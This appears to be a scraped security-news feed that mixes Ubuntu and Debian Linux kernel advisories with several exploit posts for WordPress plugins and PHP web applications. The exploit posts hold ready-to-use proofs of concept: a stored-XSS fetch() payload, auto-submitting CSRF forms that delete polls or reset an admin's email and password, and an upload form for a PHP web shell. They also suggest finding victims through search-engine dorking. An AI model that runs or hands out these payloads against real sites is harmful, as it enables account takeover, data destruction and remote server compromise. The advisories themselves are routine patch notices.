Ubuntu Security Notice 6950-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6950-2August 13, 2024linux-aws-5.15, linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-ibm: Linux kernel for IBM cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-ibm-5.15: Linux kernel for IBM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36883, CVE-2024-36940, CVE-2024-36902, CVE-2024-36975,CVE-2024-36964, CVE-2024-36938, CVE-2024-36931, CVE-2024-35848,CVE-2024-26900, CVE-2024-36967, CVE-2024-36904, CVE-2024-27398,CVE-2024-36031, CVE-2023-52585, CVE-2024-36886, CVE-2024-36937,CVE-2024-36954, CVE-2024-36916, CVE-2024-36905, CVE-2024-36959,CVE-2024-26980, CVE-2024-26936, CVE-2024-36928, CVE-2024-36889,CVE-2024-36929, CVE-2024-36933, CVE-2024-27399, CVE-2024-36946,CVE-2024-36906, CVE-2024-36965, CVE-2024-36957, CVE-2024-36941,CVE-2024-36897, CVE-2024-36952, CVE-2024-36947, CVE-2024-36950,CVE-2024-36880, CVE-2024-36017, CVE-2023-52882, CVE-2024-36969,CVE-2024-38600, CVE-2024-36955, CVE-2024-36960, CVE-2024-27401,CVE-2024-36919, CVE-2024-36934, CVE-2024-35947, CVE-2024-36953,CVE-2024-36944, CVE-2024-36939)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1060-ibm     5.15.0-1060.63   linux-image-5.15.0-1060-raspi   5.15.0-1060.63   linux-image-ibm                 5.15.0.1060.56   linux-image-raspi               5.15.0.1060.58   linux-image-raspi-nolpae        5.15.0.1060.58Ubuntu 20.04 LTS   linux-image-5.15.0-1050-gkeop   5.15.0-1050.57~20.04.1   linux-image-5.15.0-1060-ibm     5.15.0-1060.63~20.04.1   linux-image-5.15.0-1067-aws     5.15.0-1067.73~20.04.1   linux-image-aws                 5.15.0.1067.73~20.04.1   linux-image-gkeop-5.15          5.15.0.1050.57~20.04.1   linux-image-ibm                 5.15.0.1060.63~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6950-2   https://ubuntu.com/security/notices/USN-6950-1   CVE-2023-52585, CVE-2023-52882, CVE-2024-26900, CVE-2024-26936,   CVE-2024-26980, CVE-2024-27398, CVE-2024-27399, CVE-2024-27401,   CVE-2024-35848, CVE-2024-35947, CVE-2024-36017, CVE-2024-36031,   CVE-2024-36880, CVE-2024-36883, CVE-2024-36886, CVE-2024-36889,   CVE-2024-36897, CVE-2024-36902, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36916, CVE-2024-36919, CVE-2024-36928,   CVE-2024-36929, CVE-2024-36931, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36937, CVE-2024-36938, CVE-2024-36939, CVE-2024-36940,   CVE-2024-36941, CVE-2024-36944, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36950, CVE-2024-36952, CVE-2024-36953, CVE-2024-36954,   CVE-2024-36955, CVE-2024-36957, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36967, CVE-2024-36969,   CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1067.73~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1050.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1060.63~20.04.1

Ubuntu Security Notice USN-6950-2

WordPress Profilepro plugin versions 1.3 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/profilepro/# Version: <= 1.3# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low as subscriberto perform Cross-Site Scripting attacksProof of ConceptRun the following code from the browser console from the subscriber user```fetch("../wp-admin/admin-ajax.php", {  method: "POST",  headers: {    "Accept": "*/*",    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",    "X-Requested-With": "XMLHttpRequest"  },  body:"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  credentials: "include"}).then(response => {  if (!response.ok) {    throw new Error('Network response was not ok');  }  return response.text();}).then(data => console.log(data)).catch(error => console.error('Error:', error));```- As an admin, go tohttp://example.com/wp-admin/edit.php?post_type=profilepro_form- Choose the default profile, click on edit and click on add field, XSSwill pop up.Reference:https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/

WordPress Profilepro 1.3 Cross Site Scripting

Debian Linux Security Advisory 5747-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5747-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 12, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-48666 CVE-2024-36484 CVE-2024-36901 CVE-2024-36938  
                 CVE-2024-39487 CVE-2024-40947 CVE-2024-41007 CVE-2024-41009  
                 CVE-2024-41012 CVE-2024-41015 CVE-2024-41017 CVE-2024-41020  
                 CVE-2024-41022 CVE-2024-41034 CVE-2024-41035 CVE-2024-41040  
                 CVE-2024-41041 CVE-2024-41044 CVE-2024-41046 CVE-2024-41049  
                 CVE-2024-41055 CVE-2024-41059 CVE-2024-41063 CVE-2024-41064  
                 CVE-2024-41065 CVE-2024-41068 CVE-2024-41070 CVE-2024-41072  
                 CVE-2024-41077 CVE-2024-41078 CVE-2024-41081 CVE-2024-41090  
                 CVE-2024-41091 CVE-2024-42101 CVE-2024-42102 CVE-2024-42104  
                 CVE-2024-42105 CVE-2024-42106 CVE-2024-42115 CVE-2024-42119  
                 CVE-2024-42120 CVE-2024-42121 CVE-2024-42124 CVE-2024-42127  
                 CVE-2024-42131 CVE-2024-42137 CVE-2024-42143 CVE-2024-42145  
                 CVE-2024-42148 CVE-2024-42152 CVE-2024-42153 CVE-2024-42154  
                 CVE-2024-42157 CVE-2024-42161 CVE-2024-42223 CVE-2024-42224  
                 CVE-2024-42229 CVE-2024-42232 CVE-2024-42236 CVE-2024-42244  
                 CVE-2024-42247

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the oldstable distribution (bullseye), these problems have been  
fixed in version 5.10.223-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAma6T9JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QQdw/+OGGxmpgZNx20CbIlzd6l7HTabFLT1VJZY/mVVmWOIGkCjOoTuvL4VOFq  
vAs6vPMk7P1x+XMJ8kqzdn9+OO+cKYb6fFC6cFNMigIvTP/5w9V8Llsyn4liI8XB  
u1TmLiLA9tvJ5rfSzWsFWOgpL+swzYJznlL7jcaFIcLemZCQuCwmrB8ZF04F5LOa  
i0PIQwu8Cic1BmCSe6TZy8as6D7hCLPBQvqY+xW5u4/07ncVQ0tOrZn8uxndVM+h  
TSI35otncMsgDNXw1TQYgLyDwIUm79MbIm+P0THXr/HGXO14ehOHxvJ8MG8iXt/Q  
+YM1NlS5tqGPXPI+0dlGdwSx/a4XuPFOUQyxlj2B3xvhUD+rbTCtzamcjY0Qw4l3  
MhtkTjUZdOj9XdLyziAQs+bD0sKzuEu+Nkq2N6kl0Op2tRhge3aI9mwJK8v5CldY  
NiQS665HLwrjW+E4YT3hDl4ugnu66wBNDQMsR5x+gyQI9kK6vsm8xR123ugfPodL  
R4FXaf+DUQ0oVfOWJBcg6S3dmoaAwxUaJOCgHfTaqvatL8YOLvejeW1Vg+xCGGNg  
yKjdKA6bVzZjyTrqCEoSGkhx6MEiojHlwi8W+kLYNPssTkXgZ3p6dG6PPMMAxdwq  
ROJ+FccgiUApJNFmfbvU6x/pwaUzpbXP09a3bIFnNRSo40BxVio=  
=HNP3  
-----END PGP SIGNATURE-----

Debian Security Advisory 5747-1

WordPress Light Poll plugin versions 1.0.0 and below suffer from multiple cross site request forgery vulnerabilities.

    # Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks when deleting polls, which could allowattackers to make logged in users perform such action via a CSRF attackProof of Concept<html>  <body>    <form action="http://localhost/wp-admin/admin.php">      <input type="hidden" name="page" value="lp_settings" />      <input type="hidden" name="task" value="remove" />      <input type="hidden" name="id" value="1" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks in some places, which could allowattackers to make logged in users perform unwanted actions via CSRF attacksProof of ConceptWhere <<POLL_ID>> and <<ANSWER_ID>> are valid:https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>Reference:https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/

WordPress Light Poll 1.0.0 Cross Site Request Forgery

Ubuntu Security Notice 6957-1 - Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shinde discovered that an untrusted hypervisor could inject malicious #VC interrupts and compromise the security guarantees of AMD SEV-SNP. This flaw is known as WeSee. A local attacker in control of the hypervisor could use this to expose sensitive information or possibly execute arbitrary code in the trusted execution environment. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6957-1August 13, 2024linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shindediscovered that an untrusted hypervisor could inject malicious #VCinterrupts and compromise the security guarantees of AMD SEV-SNP. This flawis known as WeSee. A local attacker in control of the hypervisor could usethis to expose sensitive information or possibly execute arbitrary code inthe trusted execution environment. (CVE-2024-25742)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - TTY drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36947, CVE-2024-36919, CVE-2024-36929, CVE-2024-36955,CVE-2023-52585, CVE-2024-36931, CVE-2024-27399, CVE-2024-36957,CVE-2024-26980, CVE-2024-27398, CVE-2024-36902, CVE-2024-36928,CVE-2024-36960, CVE-2024-36904, CVE-2024-27017, CVE-2024-36959,CVE-2024-36880, CVE-2024-26936, CVE-2024-36975, CVE-2023-52882,CVE-2024-35848, CVE-2024-36886, CVE-2024-36889, CVE-2024-27401,CVE-2024-36906, CVE-2024-36937, CVE-2024-36016, CVE-2024-36964,CVE-2024-36933, CVE-2024-36031, CVE-2024-36969, CVE-2024-36954,CVE-2024-26900, CVE-2024-26952, CVE-2024-36017, CVE-2024-35947,CVE-2024-36965, CVE-2023-52752, CVE-2024-36905, CVE-2024-36938,CVE-2024-36952, CVE-2024-36940, CVE-2024-36916, CVE-2024-38600,CVE-2024-36946, CVE-2024-36953, CVE-2024-36967, CVE-2024-26886,CVE-2024-36934, CVE-2024-36950, CVE-2024-36941, CVE-2024-36883,CVE-2024-36944, CVE-2024-36939, CVE-2024-36897)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.15.0-1065-oracle  5.15.0-1065.71~20.04.1   linux-image-oracle              5.15.0.1065.71~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6957-1   CVE-2023-52585, CVE-2023-52752, CVE-2023-52882, CVE-2024-25742,   CVE-2024-26886, CVE-2024-26900, CVE-2024-26936, CVE-2024-26952,   CVE-2024-26980, CVE-2024-27017, CVE-2024-27398, CVE-2024-27399,   CVE-2024-27401, CVE-2024-35848, CVE-2024-35947, CVE-2024-36016,   CVE-2024-36017, CVE-2024-36031, CVE-2024-36880, CVE-2024-36883,   CVE-2024-36886, CVE-2024-36889, CVE-2024-36897, CVE-2024-36902,   CVE-2024-36904, CVE-2024-36905, CVE-2024-36906, CVE-2024-36916,   CVE-2024-36919, CVE-2024-36928, CVE-2024-36929, CVE-2024-36931,   CVE-2024-36933, CVE-2024-36934, CVE-2024-36937, CVE-2024-36938,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36944,   CVE-2024-36946, CVE-2024-36947, CVE-2024-36950, CVE-2024-36952,   CVE-2024-36953, CVE-2024-36954, CVE-2024-36955, CVE-2024-36957,   CVE-2024-36959, CVE-2024-36960, CVE-2024-36964, CVE-2024-36965,   CVE-2024-36967, CVE-2024-36969, CVE-2024-36975, CVE-2024-38600Package Information:  https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1065.71~20.04.1

Ubuntu Security Notice USN-6957-1

WordPress PVN Auth Popup plugin version 1.0.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS# Date: 08-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/# Version: <= 1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)Proof of Concept1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup2. In the first section, enter the payload `"><script>alert(1)</script>`for the "Login text" input3. Save and see the XSSNote: Other fields are likely vulnerableReference:https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/

WordPress PVN Auth Popup 1.0.0 Cross Site Scripting

Ubuntu Security Notice 6956-1 - Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shinde discovered that an untrusted hypervisor could inject malicious #VC interrupts and compromise the security guarantees of AMD SEV-SNP. This flaw is known as WeSee. A local attacker in control of the hypervisor could use this to expose sensitive information or possibly execute arbitrary code in the trusted execution environment. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6956-1August 12, 2024linux-azure, linux-azure-5.15, linux-azure-fde, linux-azure-fde-5.15vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shindediscovered that an untrusted hypervisor could inject malicious #VCinterrupts and compromise the security guarantees of AMD SEV-SNP. This flawis known as WeSee. A local attacker in control of the hypervisor could usethis to expose sensitive information or possibly execute arbitrary code inthe trusted execution environment. (CVE-2024-25742)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - TTY drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36933, CVE-2024-36960, CVE-2024-26936, CVE-2024-36975,CVE-2023-52882, CVE-2024-27401, CVE-2024-36929, CVE-2024-36939,CVE-2024-35947, CVE-2024-36883, CVE-2024-26886, CVE-2024-36952,CVE-2024-36950, CVE-2024-36940, CVE-2024-36897, CVE-2023-52585,CVE-2024-26900, CVE-2024-36959, CVE-2024-36928, CVE-2024-36938,CVE-2024-36016, CVE-2024-36965, CVE-2024-36967, CVE-2024-36889,CVE-2024-36905, CVE-2024-36969, CVE-2024-36916, CVE-2024-36954,CVE-2024-27017, CVE-2024-36941, CVE-2024-36957, CVE-2024-27399,CVE-2024-36937, CVE-2024-36955, CVE-2024-38600, CVE-2023-52752,CVE-2024-36953, CVE-2024-26980, CVE-2024-36902, CVE-2024-26952,CVE-2024-36904, CVE-2024-36964, CVE-2024-36946, CVE-2024-36880,CVE-2024-36906, CVE-2024-36947, CVE-2024-36886, CVE-2024-36934,CVE-2024-35848, CVE-2024-36919, CVE-2024-36017, CVE-2024-36944,CVE-2024-36931, CVE-2024-27398)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1070-azure   5.15.0-1070.79   linux-image-5.15.0-1070-azure-fde  5.15.0-1070.79.1   linux-image-azure-fde-lts-22.04  5.15.0.1070.79.47   linux-image-azure-lts-22.04     5.15.0.1070.68Ubuntu 20.04 LTS   linux-image-5.15.0-1070-azure   5.15.0-1070.79~20.04.1   linux-image-5.15.0-1070-azure-fde  5.15.0-1070.79~20.04.1.1   linux-image-azure               5.15.0.1070.79~20.04.1   linux-image-azure-cvm           5.15.0.1070.79~20.04.1   linux-image-azure-fde           5.15.0.1070.79~20.04.1.47After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6956-1   CVE-2023-52585, CVE-2023-52752, CVE-2023-52882, CVE-2024-25742,   CVE-2024-26886, CVE-2024-26900, CVE-2024-26936, CVE-2024-26952,   CVE-2024-26980, CVE-2024-27017, CVE-2024-27398, CVE-2024-27399,   CVE-2024-27401, CVE-2024-35848, CVE-2024-35947, CVE-2024-36016,   CVE-2024-36017, CVE-2024-36880, CVE-2024-36883, CVE-2024-36886,   CVE-2024-36889, CVE-2024-36897, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36906, CVE-2024-36916, CVE-2024-36919,   CVE-2024-36928, CVE-2024-36929, CVE-2024-36931, CVE-2024-36933,   CVE-2024-36934, CVE-2024-36937, CVE-2024-36938, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36944, CVE-2024-36946,   CVE-2024-36947, CVE-2024-36950, CVE-2024-36952, CVE-2024-36953,   CVE-2024-36954, CVE-2024-36955, CVE-2024-36957, CVE-2024-36959,   CVE-2024-36960, CVE-2024-36964, CVE-2024-36965, CVE-2024-36967,   CVE-2024-36969, CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1070.79   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1070.79.1   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1070.79~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1070.79~20.04.1.1

Ubuntu Security Notice USN-6956-1

Giftora version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Giftora V 1.0 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML Add New posts .

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] infected file :  /admincp/new-post.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>  
[+] demo https://127.0.0.1/giftora.webister.net/blog

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Giftora 1.0 Cross Site Request Forgery

Gas Agency Management version 2022 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Gas Agency Management 2022 Remote File Upload Vulnerability                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : gasmark/manage_website.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="ar">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushak was here</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data">  
               <input type="hidden" name="old_website_image" value="old_website_image.jpg">  
        <label for="website_image">S0M3 ThING baD:</label>  
        <input type="file" name="website_image" id="website_image"><br><br>

        <input type="submit" name="btn_web" value="do !T">  
    </form>  
</body>  
</html>

[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Gas Agency Management 2022 Shell Upload

Ubuntu Security Notice 6955-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6955-1August 12, 2024linux-oem-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.8: Linux kernel for OEM systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - Microsoft Hyper-V drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-35987, CVE-2024-36931, CVE-2024-38614, CVE-2024-35857,CVE-2024-36949, CVE-2024-38599, CVE-2024-35994, CVE-2024-35849,CVE-2024-36916, CVE-2024-38590, CVE-2024-36944, CVE-2024-38561,CVE-2024-38538, CVE-2024-36017, CVE-2024-38593, CVE-2024-36028,CVE-2024-36960, CVE-2024-36002, CVE-2024-36967, CVE-2024-36898,CVE-2024-35989, CVE-2024-36975, 